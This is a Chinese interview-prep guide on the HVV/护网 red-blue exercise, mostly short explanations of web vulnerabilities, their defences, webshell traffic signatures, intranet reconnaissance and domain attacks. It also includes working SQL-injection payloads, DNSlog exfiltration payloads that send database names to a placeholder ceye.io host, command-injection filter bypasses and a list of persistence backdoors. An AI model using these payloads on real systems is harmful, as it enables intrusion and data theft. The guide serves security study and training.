关于面经那些事(护网面试整理)

admin 2023年3月12日22:09:54评论413 views字数 15745阅读52分29秒阅读模式

关于面经那些事(护网面试整理)

免责声明

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

什么是“护网行动”?

「护网行动」是以「公安部牵头」的,用以评估企事业单位的网络安全的活动。具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。

当前,我国网络安全形势严峻,「为了防止羊被偷,我们得在羊被偷之前就开始识别风险、加固羊圈建设」。护网行动就是在这样的背景下开展的。

护网行动每年举办一次,政府单位、事业单位、国企单位、名企单位等都必须参与!

「护网行动」是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来越多的单位都加入到护网行动中,网络安全对抗演练越来越贴近实际情况,各机构对待网络安全需求也从被动构建,升级为业务保障刚需。

护网分类

护网一般按照行政级别分为

  • 国家级护网

  • 省级护网

  • 市级护网

  • 重大节日活动护网(如:建党一百周年,冬奥会等)

护网时间

  • 每年的5、6月左右开始(不确定)

  • 持续2~3周时间

护网的规则

护网一般分为「红蓝两队」,做红蓝对抗。红队为攻击队,红队的构成主要有“国家队”(国家的网安等专门从事网络安全的技术人员)、厂商的渗透技术人员。其中“国家队”的占比大概是60%左右,厂商的技术人员组成的攻击小队占比在40%左右。一般来说一个小队大概是3个人,分别负责信息收集、渗透、打扫战场的工作。蓝队为防守队,一般是随机抽取一些单位参与。

开始面经分享

  1. 基础漏洞部分


00-TOP10漏洞

1、SQL注入 2、失效的身份认证和会话管理3、跨站脚本攻击XSS4、直接引用不安全的对象5、安全配置错误6、敏感信息泄露7、缺少功能级的访问控制8、跨站请求伪造CSRF9、使用含有已知漏洞的组件10、未验证的重定向和转发

01-SQL注入漏洞

1.SQL注入原理SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得恶意的SQL语句被插入输入字段中执行(例如将数据库内容转储给攻击者)。2.SQL注入分类(1)注入点的不同分类●数字类型的注入●字符串类型的注入(2)提交方式的不同分类●GET注入●POST注入●COOKIE注入●HTTP注入(3)获取信息的方式不同分类●基于布尔的盲注如果数据库中可以查到相应的数据,页面会正常显示,反之异常。
●基于时间的盲注无论输入任何数据,页面的效果完全一样,根据页面是否延迟判断出数据库中查询出的结果。
●基于报错的注入还有二次注入,宽字节注入等盲注和延时注入的共同点?都是一个字符一个字符的判断盲注原理 1. 核心 将数据库中查询的数据结果进行截断为单个字符,然后同构造逻辑语句。通过判断页面显示是 否异常或页面是否演示来判断数据库中查询的结果 3 .SQL注入防御SQL语句预编译和绑定变量使用足够严格的过滤和安全防御4.SQL注入判断注入点的思路寻找与数据库交互的可控参数GETPOSTCOOKIEHTTP头5.报错注入的函数有哪些?extractvalue(1, concat(0x5c,(select user())))updatexml(0x3a,concat(1,(select user())),1)exp((SELECT * from(select user())a))``ST_LatFromGeoHash((select * from(select * from(select user())a)b))GTID_SUBSET(version(), 1)6.Sql 注入无回显的情况下,利用 DNSlog,mysql 下利用什么构造代码,mssql 下又如何1)没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于防火墙的存在,容易被封禁IP,可以尝试调整请求频率,有条件的使用代理池进行请求。2)此时也可以使用 DNSlog 注入,原理就是把服务器返回的结果放在域名中,然后读取 DNS 解析时的日志,来获取想要的信息。3)Mysql 中利用 load_file() 构造payload ' and if((select load_file(concat('\',(select database()),'.xxx.ceye.ioabc'))),1,0)#(4)Mssql 下利用 master..xp_dirtree 构造payloadDECLARE @host varchar(1024);SELECT @host=(SELECT db_name())+'.xxx.ceye.io';EXEC('master..xp_dirtree"'+@host+'foobar$"');SQL注入时 and or 被过滤怎办?1.大小写变形 2.编码 3.添加注释 4.双写法 5.利用符号形式 6.浮点数 #数字被注释 7.函数替代 #符号被注释sql 注入常见的过 WAF 方法?绕过技术:1,关键字可以用%(只限 IIS 系列)。比如 select,可以 sel%e%ct2,通杀的,内联注释,如 /*!select*/3,编码,可两次编码4,multipart 请求绕过,在 POST 请求中添加一个上传文件,绕过了绝大多数 WAF5,参数绕过,复制参数,id=1&id=16,组合法 如 and 可以用&&再 URL 编码7、替换法,如 and 改成&&;=可以用 like 或 in 等sql注入的告警的流量特征看哪些方面? 如:and 1=1、order by、单引号/双引号、union select、information_schema column_name 字段名 table_name 字段所属表名 table_schema 字段所属表所属库的名字

02-xss漏洞

1. 原理XSS全称为Cross Site Scripting,为了和CSS分开简写为XSS,中文名为跨站脚本。该漏洞发生在用户端,是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。2.分类:反射型XSS储存型XSSDOM XSS3.危害:1.用户的Cookie被获取,其中可能存在Session ID等敏感信息。若服务器端没有做相应防护,攻击者可用对应Cookie登陆服务器。2.攻击者能够在一定限度内记录用户的键盘输入。3.攻击者通过CSRF等方式以用户身份执行危险操作。4.XSS蠕虫。5.获取用户浏览器信息。6.利用XSS漏洞扫描用户内网。4.防御:总体思路:对用户输入进行过滤,对输出进行编码;1.对用户输入进行XSS防御方式有2种:基于黑名单的过滤和基于白名单的过滤. 而白名单相对来说更安全;黑名单:只规定哪些数据不能被输入,很可能被绕过;比如对 ' " <> 等进行过滤白名单:只定义哪些数据正常才能被提交;2.设置http-only参数为true,这样JS就不能读取cookie信息了;(特殊常见可能被绕过)3.使用一些函数进行防御4.不要随意打开一些来历不明的网站或链接如何快速判定XSS类型?存储型XSS:你发送一次带XSS代码的请求,以后这个页面的返回包里都会有XSS代码;反射型XSS:你发送一次带XSS代码的请求,只能在当前返回的数据包中发现XSS代码;DOM型XSS:你发送一次带XSS代码的请求,在返回包里压根儿就找不到XSS代码的影子;存储型XSS怎么利用XSS攻击的原理是通过修改或者添加页面上的JavaScript恶意脚本,在浏览器渲染页面的时 候执行该脚本,从而实现窃取COOKIE或者调用Ajax实现其他类型的CSRF攻击,还可以插入 beef进行钓鱼等 CORS(浏览器同源策略) js =>ajax 去请求其他网站的东西 test.com 根据浏览器的CORS策略 他只能在test.com里面请求东西 test.com 调用ajax 去访问 xxxx.com assdasd.test.com 如果目标的CORS头 默 认不放行test.com 这样 test.com 的ajax请求就不会访问其他网站 

03-csrf漏洞

03.1原理:当黑客发现某网站存在CSRF漏洞,并且构造攻击参数将payload制作成网页,用户访问存在CSRF漏洞的网站,并且登录到后台,获取cookie,此时黑客发送带有payload的网址给用户,用户同时打开黑客所发来的网址,执行了payload,则造成了一次CSRF攻击03.2形成原因:主要是漏洞网站没有经过二次验证,和用户在浏览漏洞网站的时候,同时点击了hack制造的payload03.3.如何防止 CSRF?1.验证 referer2.验证 token03.4csrf成功利用的条件1- 用户在统一浏览器下2- 没有关闭浏览器的情况下3- 访问了攻击者精心伪装好的恶意链接

04-ssrf漏洞

1 原理SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统1)服务器允许向其他服务器获取资源2)但是并没有对该地址做严格的过滤和限制3)所以导致了攻击者可以向受害者服务器,传入任意的URL 地址,并将数据返回2防御:1.限制请求的端口为 HTTP 常用的端口,比如 80,443,8080,80882.黑名单内网 IP。3.禁用不需要的协议,仅仅允许 HTTP 和 HTTPS3.SSRF 禁用 127.0.0.1 后如何绕过,支持哪些协议?(1)利用进制转换(2)利用DNS解析(3)利用句号(127001(4)利用[::](http://[::]:80/);(5)利用@(http://[email protected]);(6)利用短地址(http://dwz.cn/11SMa);(7)协议(Dict://、SFTP://、TFTP://、LDAP://、Gopher://)最主要的是可以搞内网漏洞存在的地方:1.能够对外发起网络请求的地方2.请求远程服务器资源的地方3.数据库内置功能4.邮件系统5.文件处理6.在线处理工具

05-文件上传漏洞

05.0原理:由于程序员在对用户文件上传功能实现代码没有严格限制用户上传文件后缀以及文件类型或者处理缺陷,而导致用户可以越过本身权限向服务器上传木马去控制服务器.05.1文件上传分类黑白名单05.2危害操作木马文件提权 获取网站权限05.3绕过方法:1).黑名单a.后缀名不完整 .php5 .phtmlb.上传.htacessc.大小写d.在数据包中 后文件缀名前加空格e.后缀名前加.f.加上::$DATAg.未循环验证,可以使用x.php..类似的方法2).白名单(一般需要配合其他漏洞一起利用)a.%00截断b.图片马c.条件竞争05.4修复:1.后端验证:采用服务端验证模式2.后缀验证:基于白名单,黑名单过滤3.MIME验证:基于上传自带类型艰检测4.内容检测:文件头,完整性检测5.自带函数过滤

06-文件包含漏洞

06.1类型1.本地文件包含2.远程文件包含 :即加载远程文件,在`php.ini`中开allow_url_include 、allow_url_fopen选项。开启后可以直接执行任意代码。PHP文件包含函数1.include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。2.inclue_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。3.require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终止程序。4.require_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。06.2利用:1.读取敏感文件2.远程包含shell3.图片上传并包含图片shenll4.使用伪协议5.包含日志文件GetShell6.截断包含06.3修复方案1.禁止远程文件包含allow_url_include=off2.配置open_basedir=指定目录,限制访问区域。3.过滤../等特殊符号4.修改Apache日志文件的存放地址5.开启魔术引号magic_quotes_qpc=on6.尽量不要使用动态变量调用文件,直接写要包含的文件06.4文件包含的伪协议file:// 访问本地文件系统http:// 访问 HTTPs 网址ftp:// 访问 ftp URLPhp:// 访问输入输出流Zlib:// 压缩流Data:// 数据Ssh2:// security shell2Expect:// 处理交互式的流

07-反序列化漏洞

1.php反序列化原理未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法2.java反序列化原理1)Java序列化指Java对象转换为字节序列的过程2)Java反序列化指字节序列恢复为Java对象的过程3) Commons-collections 爆出第一个漏洞开始,Java反序列化漏洞的事件就层出不穷。4)在Java中,利用ObjectInputStream的readObject方法进行对象读取5)可以深入了解 ysoserial有哪些gadgets3.1fastjson工作形式fastjson的功能就是将json格式转换为类、字符串等供下一步代码的调用,或者将类、字符串等数据转换成json数据进行传输,有点类似序列化的操作3.2fastjson利用方式1.对于 fastjson版本 <= 1.2.24的情况,利用思路主要有2通过触发点JSON.parseObject()这个函数,将json中的类设置成com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl并通过特意构造达到命令执行利用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImplTemplatesImpl类,而这个类有一个字段就是_bytecodes,有部分函数会根据这个_bytecodes生成java实例,这就达到fastjson通过字段传入一个类,再通过这个类被生成时执行构造函数。2.通过JNDI注入jndi是一个Java命令和目录接口,举个例子,通过jndi进行数据库操作,无需知道它数据库是mysql还是ssql,还是MongoDB等,它会自动识别。当然rmi也可以通过jndi实现,rmi的作用相当于在服务器上创建了类的仓库的api,客户端只用带着参数去请求,服务器进行一系列处理后,把运算后的参数还回来。jndi注入原理就是将恶意的Reference类绑定在RMI注册表中,其中恶意引用指向远程恶意的class文件,当用户在JNDI客户端的lookup()函数参数外部可控或Reference类构造方法的classFactoryLocation参数外部可控时,会使用户的JNDI客户端访问RMI注册表中绑定的恶意Reference类,从而加载远程服务器上的恶意class文件在客户端本地执行,最终实现JNDI注入攻击导致远程代码执行序列化操作和反序列化操作需要的函数函数 作用JSON.toJSONString(Object) 将对象序列化成json格式JSON.toJSONString(Object,SerializerFeature.WriteClassName) 将对象序列化成json格式,并且记录了对象所属的类的信息JSON.parse(Json) 将json格式返回为对象(但是反序列化类对象没有@Type时会报错)JSON.parseObject(Json) 返回对象是com.alibaba.fastjson.JSONObject类JSON.parseObject(Json, Object.class) 返回对象会根据json中的@Type来决定JSON.parseObject(Json, User.class, Feature.SupportNonPublicField); 会把Json数据对应的类中的私有成员也给还原
3.3fastjson不出网怎么利用目前公开已知的poc有两个:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImplorg.apache.tomcat.dbcp.dbcp2.BasicDataSource第一种利用方式需要一个特定的触发条件,解析JSON的时候需要使用Feature才能触发,参考如下代码:JSONObject.parseObject(sb.toString(), new Feature[]{Feature.SupportNonPublicField});第二种利用方式则需要应用部署在Tomcat应用环境中,因为Tomcat应用环境自带tomcat-dbcp.jar对于SpringBoot这种自带Tomcat可以直接以单个jar文件部署的需要在maven中配置tomcat-dbcp。而且对于不同的Tomcat版本使用的poc也不同:• Tomcat 8.0以后使用org.apache.tomcat.dbcp.dbcp2.BasicDataSource• Tomcat 8.0以下使用org.apache.tomcat.dbcp.dbcp.BasicDataSource无回显怎么办 1.一种是直接将命令执行结果写入到静态资源文件里,如html、js等,然后通过http访问就 可以直接看到结果 2.通过dnslog进行数据外带,但如果无法执行dns请求就无法验证了 3.直接将命令执行结果回显到请求Poc的HTTP响应中


4.shrio反序列化漏洞原理 shrio550的原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。payload产生过程命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值shrio550的特征返回包中包含rememberMe=deleteMe字段。
shrio721原理由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。5.jboss反序列化漏洞原理jboss的反序列化漏洞出现在jbossserveralldeployhttpha-invoker.sarinvoker.warWEB-INFclassesorgjbossinvocationhttpservlet目录下的ReadOnlyAccessFilter.class文件中的doFilter中。程序获取http数据保存到了httpRequest中,序列化后保存到了ois中,然后没有进行过滤操作,直接使用了readObject()进行了反序列化操作保存到了mi变量中,这其实就是一个典型的java反序列化漏洞。6..weblogic反序列化漏洞原理Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象,涉及到序列化和反序列化操作,如果能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效果常见的weblogic漏洞1.#CVE-2016-0638Weblogic 直接反序列化基于Weblogic t3协议引起远程代码执行的反序列化漏洞漏洞实为CVE-2015-4852绕过拜Oracle一直以来的黑名单修复方式所赐2.#CVE-2016-3510基于Weblogic t3协议引起远程代码执行的反序列化漏洞3.#CVE-2017-3248基于Weblogic t3协议引起远程代码执行的反序列化漏洞属于Weblogic JRMP反序列化4.#CVE-2018-2628基于Weblogic t3协议引起远程代码执行的反序列化漏洞属于 Weblogic JRMP反序列化5.#CVE-2018-2893基于Weblogic t3协议引起远程代码执行的反序列化漏洞实为CVE-2018-2628绕过同样拜Oracle一直以来的黑名单修复方式所赐属于Weblogic JRMP反序列化weblogic权限绕过CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。攻击者可以构造特殊请求的URL,即可未授权访问到管理后台页面,访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。漏洞利用第一种方法是通过com.tangosol.coherence.mvel2.sh.ShellSession第二种方法是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

08-XXE漏洞

08.1XXE的原理# XXE漏洞就是xml外部实体注入漏洞, 通常和危害一起回答出来会感觉更加流畅和自然 # 通常发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致可加载恶意外部文件, 造成文件读取、 命令执行、 内网端口扫描、 攻击内网网站、 发起dos攻击等危害。08.2分类:有回显型      无回显型

09-代码执行漏洞

09.1原理:没有对接口输入的内容进行严格的判断 造成攻击者精心构造的代码非法执行当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时,没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。相关函数:PHP:eval assertPython:execasp:<%=CreateObject(“wscript.shell”).exec(“cmd.exe /cipconfig”).StdOut.ReadAll()%>09.2危害:执行代码让网站写shell甚至控制服务器09.3漏洞利用:执行代码的函数:eval、assertcallback函数:preg_replace + /e模式反序列化:unserialize()(反序列化函数)09.4防御修复:1.使用json保存数组,当读取时就不需要使用eval2.对于必须使用eval的地方,一定严格处理用户数据3.字符串使用单引号包括可控代码,插入前使用addslashes转义4.放弃使用preg_replace的e修饰符,使用preg_replace_callback()替换5.若必须使用preg_replace的e修饰符,则必用单引号包裹正则匹配出的对象

10-命令执行漏洞

10.1命令执行怎么绕过cat 233.txt# 管道符号绕过# 空格绕过${IFS}# %0a、%09# 重定向绕过< <># 变量拼接绕过@kali:$ a=c;b=at;c=fl;d=ag;$a$b $c$d# 单引号、双引号绕过ca''t flagcat"" flag# 编码绕过#$(printf "x63x61x74x20x2fx66x6cx61x67") ==>cat /flag#{printf,"x63x61x74x20x2fx66x6cx61x67"}|$0 ==>cat /flag#$(printf "154163") ==>ls$(printf "154163")# 查看等价替换(1)more:一页一页的显示档案内容(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页(3)head:查看头几行(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示(5)tail:查看尾几行(6)nl:显示的时候,顺便输出行号(7)od:以二进制的方式读取档案内容(8)vi:一种编辑器,这个也可以查看(9)vim:一种编辑器,这个也可以查看(10)sort:可以查看(11)uniq:可以查看(12)file -f:报错出具体内容# 反斜线绕过cat flag# 内敛注释绕过#`命令`和$(命令)都是执行命令的方式echo "m0re`cat flag`"echo "m0re $(cat flag)"# base64编码绕过`echo "Y2F0IGZsYWc="|base64 -d`# 绕过长度限制# >命令会将原有文件内容覆盖echo '123'>xxoo.txt# >>符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容echo '233'>>xxoo.txt# 命令换行绕过caatag

11-常见端口

FTP 20 FTP服务器真正传输所用的端口,用于上传、下载FTP 21 用于FTP的登陆认证SSH、SFTP 、 22 加密的远程登录,文件传输Telnet 23 远程登录(在本地主机上使用此端口与远程服务器的22/3389端口连接)SMTP 25 用于发送邮件HTTP 80 用于网页浏览POP3 110 SUN公司的RPC服务所有端口Network News Transfer Protocol 119 NEWS新闻组传输协议,承载USENET通信SMTP 161 Simple Network Management Protocol,简单网络管理协议SNMP Trap 162 SNMP陷阱HTTPS 443 加密的网页浏览端口CIFS 445 公共Internet文件系统sql server 1433 Microsoft的SQL服务开放的端口 数据库Oracle 1521 数据库NFS 2049 通过网络,让不同的机器、不同的操作系统实现文件共享MySQL 3306 数据库WIN2003远程登录 3389 Windows 2000(2003) Server远程桌面的服务端口,本地服务器开放此端口,去连接到远程的服务器QQ· 4000 腾讯QQ客户端开放此端口WebLogic 7001 一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器Wingate 8010 Wingate代理开放此端口TOMCAT 8080 WWW代理开放此端口

12-如果让你渗透一个网站,你的思路是什么?

12.1信息收集——寻找漏洞——利用漏洞1.信息收集技术收集网站的Whois常见的端口号信息收集网站的IP,C端,域名及子域名判断网站操作系统 Linux大小写敏感Windows大小写不敏感扫描敏感文件 robots.txtcrossdomain.xmlsitemap.xmlxx.tar.gzxx.bak等确定网站采用的语言 如PHP / Java / Python等找后缀,比如php/asp/jsp前端框架 如jQuery / BootStrap / Vue / React / Angular等查看源代码中间服务器 如 Apache / Nginx / IIS 等查看header中的信息根据报错信息判断根据默认页面判断Web容器服务器 如Tomcat / Jboss / Weblogic等后端框架 根据Cookie判断根据CSS / 图片等资源的hash值判断根据URL路由判断 如wp-admin根据网页中的关键字判断根据响应头中的X-Powered-ByCDN信息 常见的有Cloudflare、yunjiasu探测有没有WAF,如果有,什么类型的 有WAF,找绕过方式没有,进入下一步扫描敏感目录,看是否存在信息泄漏 扫描之前先自己尝试几个的url,人为看看反应12.2.如何判断是否有CDN。采用多地ping的方法看IP是否唯一12.3.如何绕过CDNDNS历史解析记录查找子域名利用SSL证书寻找真实IP国外主机解析域名

13-内网渗透思路

权限维持——内网信息收集——横向13.内网的信息收集技术13.1主机信息收集1.网络配置 ipconfig /all2.操作系统 systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"3.软件信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"4.服务信息 wmic /namespace:rootsecuritycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe5.用户列表 net user6.本地管理员信息 net localgroup administrators7.端口信息 netstat –ano8.补丁信息 wmic qfe get Caption,Description,HotFixID,InstalledOn9.查防火墙 netsh firewall show config13.2域内信息收集是否有域使用ipconfig /all命令可以查看网关IP地址、DNS的IP地址以及判断当前主机是否在域内:通过反向解析查询命令nslookup来解析域名的IP地址,使用解析出来的IP地址进行对比,判断域控制器和DNS服务器是否在同一台服务器上登录域信息 net config workstation域内信息收集ICMP探测内网 for /L %I in (1,1,254DO @ping -w 1 -n 1 192.168.174.%I | findstr "TTL="ARP探测内网端口信息收集查询域信息 net view /domain查询域主机 net view /domain:XXX查询域用户 net group /domain查找域控Nslookup -type=SRV _ldap._tcpnet time /domainnet group "Domain Controllers" /domain查域用户信息 net user /domain查询域管理员 net group "Domain Admins" /domain查询域sid信息 whoami /all

14-介绍几种权限维持的方法

匿名用户PHP内存型木马Shift 后门放大镜后门user.ini文件构成的PHP后门注册表开机自动启动项DLL 劫持计划任务

15-常见的webshell管理工具

蚁剑冰蝎冰蝎是一款基于Java开发的动态二进制加密通信流量的新型Webshell客户端,由于它的通信流量被加密,使用传统的WAF、IDS等设备难以检测,目前在HVV中使用较多的一款工具。哥斯拉哥斯拉是一款继冰蝎之后又一款于Java开发的加密通信流量的新型Webshell客户端,内置了3种有效载荷以及6种加密器,6种支持脚本后缀,20个内置插件,也是目前在HVV中使用较多的一款工具。冰蝎 哥斯拉流量特征冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。冰蝎的通信过程可以分为两个阶段:密钥协商 加密传输冰蝎2特征:默认Accept字段的值很特殊,而且每个阶段都一样冰蝎内置了十余种UserAgent ,每次连接 shell 会随机选择一个进行使用。但都是比较老的,r容易被检测到,但是可以在burp中修改ua头。Content-Length: 16, 16就是冰蝎2连接的特征冰蝎3特征:冰蝎3取消动态密钥获取,目前很多waf等设备都做了冰蝎2的流量特征分析,所以3取消了动态密钥获取;php抓包看包没有发现什么特征,但是可以发现它是POST请求的1)Accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征2)ua头该特征属于弱特征。通过burp可以修改,冰蝎3.0内置的默认16个userAgent都比较老。现实生活中很少有人使用,所以这个也可以作为waf规则特征jsp抓包特征分析Content-Type: application/octet-stream 这是一个强特征查阅资料可知octet-stream的意思是,只能提交二进制,而且只能提交一个二进制,如果提交文件的话,只能提交一个文件,后台接收参数只能有一个,而且只能是流(或者字节数组);很少使用。哥斯拉是一个基于流量、HTTP全加密的webshell管理工具相对于蚁剑,冰蝎;哥斯拉具有以下优点。全部类型的shell均过市面所有静态查杀流量加密过市面全部流量wafGodzilla自带的插件是冰蝎、蚁剑不能比拟的

16-什么是脱壳?

一般是指除掉程序的保护,用来修改程序资源。马甲”能穿也能脱。相应的,有加壳也一定会有解壳(也叫脱壳)。脱壳主要有两种方法:硬脱壳和动态脱壳。第一种,是硬脱壳,这是指找出加壳软件的加壳算法,写出逆向算法,就像压缩和解压缩一样。由于,目前很多“壳”均带有加密、变形的特点,每次加壳生成的代码都不一样。硬脱壳对此无能为力,但由于其技术门槛较低,仍然被一些杀毒软件所使用。第二种,是动态脱壳。由于加壳的程序运行时必须还原成原始形态,即加壳程序会在运行时自行脱掉“马甲”。目前,有一种脱壳方式是抓取(Dump)内存中的镜像,再重构成标准的执行文件。相比硬脱壳方法,这种脱壳方法对自行加密、变形的壳处理效果更好。

17-溯源方法以及介绍

溯源方法攻击源捕获——溯源处置——攻击者画像攻击源捕获来源1.审查邮件钓鱼2.获取安全设备数据进行分析,特别是流量数据;3.网络资产所在的服务器运行状态;4.中间件日志信息查看;5.合理运用蜜罐系统进行溯源追踪。溯源处置1.域名查询2.IP查询3.身份查询4.文件查询攻击者画像1.攻击路径2.攻击目的3.网络代理4.攻击手法5.攻击者的身份画像,由四个部分组成,分别是:虚拟身份:ID、昵称、网名真实身份:姓名、家庭/办公物理位置联系方式:手机号、QQ/微信、邮箱组织情况:单位名称、职位信息

18-waf原理以及绕过

18.1waf工作原理WAF工作方式是对接收到的数据包进行正则匹配过滤,如果正则匹配到与现有漏洞知识库的攻击代码相同,则认为这个恶意代码,从而对于进行阻断。所以,对于基于规则匹配的WAF,需要每天都及时更新最新的漏洞库。waf工作工程解析HTTP请求对接收到数据请求流量时会先判断是否为HTTP/HTTPS请求,之后会查看此URL请求是否在白名单之内,如果该URL请求在白名单列表里,直接交给后端Web服务器进行响应处理,对于不在白名单之内的对数据包解析后进入到规则检测部分。匹配规则解析后的数据包会进入到检测体系中进行规则匹配,检查该数据请求是否符合规则,识别出恶意攻击行为。防御动作如果符合规则则交给后端Web服务器进行响应处理,对于不符合规则的请求会执行相关的阻断、记录、告警处理。不同的WAF产品会自定义不同的拦截警告页面,在日常渗透中我们也可以根据不同的拦截页面来辨别出网站使用了哪款WAF产品,从而有目的性的进行WAF绕过。18.2waf绕过-文件上传安全狗通过替换大小写来进行绕过通过删减空格来进行绕过通过字符串拼接绕过双文件上传绕过HTTP header 属性值绕过HTTP header 属性名称绕过等效替换绕过修改编码绕过黑名单后缀绕过文件扩展名绕过ashx上传绕过特殊文件名绕过Windows流特性绕过白名单后缀绕过白名单后缀绕过htaccess解析漏洞突破MIME限制上传解析漏洞绕过18.3waf绕过-SQL注入各种编码绕过字母大小写转换绕过空格过滤绕过双关键字绕过内联注释绕过异常Method绕过超大数据包绕过复参数绕过宽字节绕过%00截断Cookie/X-Forwarded-For注入绕过冷门函数/字符/运算符绕过18.4waf绕过-RCE通配符连接符未初始化的bash变量

19-了解域渗透吗?说说域渗透


19.1-制作白银票据 制作黄金票据 二者区别:黄金票据只有30分钟,白银票据是永久 当然了,域渗透肯定不止那么点内容,东西还是很多的。下次更新了会把更新好的终极版发给大家19.2内网黄金票据、白银票据的区别和利用方法白银票据:抓取到了域控服务hash的情况下,在客户端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。黄金票据:直接抓取域控中账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。通过mimkatz执行,导出域控中账号的Hash

20.常见的端口漏洞

21 ftp FTP服务端有很多 anonymous 匿名未授权访问 爆破
22 ssh root密码爆破 后门用户 可以google查一些关于ssh后门的文章 里面的默认密
可能会登入进去
23 telnet 一般会发生在 路由器 或者交换机 嵌入式设备 管理端口 攻击方法 弱口令
25 smtp 默认用户 默认密码 邮件账号爆破
80 http web 常见的Owasp top 10 中间件反序列化 中间件溢出 fastcgi配置不
造成fastcgi端口泄露
110 pop3 默认用户 默认密码 邮件账号爆破
443 https openssl 心脏滴血(影响范围较小) SSL/TLS低版本存在的漏洞
135 139 445 netbios smb MS17010
3389 RDP CVE-2019-0708
3389和443、445有什么漏洞?
445:ms06_040,蠕虫,勒索病毒、MS17-010
443:ssl心脏滴血
3389:rdp漏洞、弱口令、cve-2019-0708、ms12-20

 

21.GET和POST

关于面经那些事(护网面试整理)

使用需知

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

封面图片来源网络,如有侵权联系必删。

安全小白,不喜绕过。

原文始发于微信公众号(LK安全):关于面经那些事(护网面试整理)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月12日22:09:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于面经那些事(护网面试整理)https://cn-sec.com/archives/1598462.html

发表评论

匿名网友 填写信息